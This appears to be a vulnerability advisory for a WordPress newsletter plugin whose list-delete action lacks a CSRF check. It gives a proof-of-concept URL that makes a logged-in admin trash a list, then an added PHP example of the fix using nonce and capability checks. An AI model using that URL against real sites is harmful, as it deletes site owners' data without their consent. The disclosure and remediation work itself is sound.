Description

The plugin does not perform a CSRF check when deleting a list, which could allow attackers to make logged-in admins perform that action via a CSRF attack.
Make an admin open a URL (where `<ID>` is a valid id):
http://example.com/wp-admin/admin.php?page=wp_newsletter_show_items&action=trash&id=<ID>
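
The missing check, shown as a nonce-protected version of the delete action. This is an added example, not the plugin's own code: the function names, the `manage_options` capability and the table name are assumptions, and only the `page`, `action` and `id` parameters come from the report.

```php
<?php
// Added example, not the plugin's code. Function names, the capability and
// the table name are assumptions; only the query parameters come from the page.

// Build the "trash" link with a nonce bound to this action and this list id.
function example_trash_list_url( $id ) {
	$id  = absint( $id );
	$url = add_query_arg(
		array(
			'page'   => 'wp_newsletter_show_items',
			'action' => 'trash',
			'id'     => $id,
		),
		admin_url( 'admin.php' )
	);
	// Appends _wpnonce=<token>, tied to the current user and session.
	return wp_nonce_url( $url, 'example_trash_list_' . $id );
}

// Process the request only after the capability and nonce checks pass.
function example_handle_trash_list() {
	global $wpdb;

	$page   = isset( $_GET['page'] ) ? sanitize_key( $_GET['page'] ) : '';
	$action = isset( $_GET['action'] ) ? sanitize_key( $_GET['action'] ) : '';
	if ( 'wp_newsletter_show_items' !== $page || 'trash' !== $action || ! isset( $_GET['id'] ) ) {
		return;
	}

	$id = absint( $_GET['id'] );
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'You are not allowed to delete lists.', 403 );
	}

	// Dies unless _wpnonce is present and valid for this exact action string,
	// so a request carrying only page, action and id is rejected.
	check_admin_referer( 'example_trash_list_' . $id );

	// Hypothetical table name; the delete uses a prepared integer placeholder.
	$wpdb->delete( $wpdb->prefix . 'example_newsletter_lists', array( 'id' => $id ), array( '%d' ) );

	wp_safe_redirect( admin_url( 'admin.php?page=wp_newsletter_show_items' ) );
	exit;
}
add_action( 'admin_init', 'example_handle_trash_list' );
```

Binding the nonce action string to the list id means a token issued for one list cannot be replayed against another.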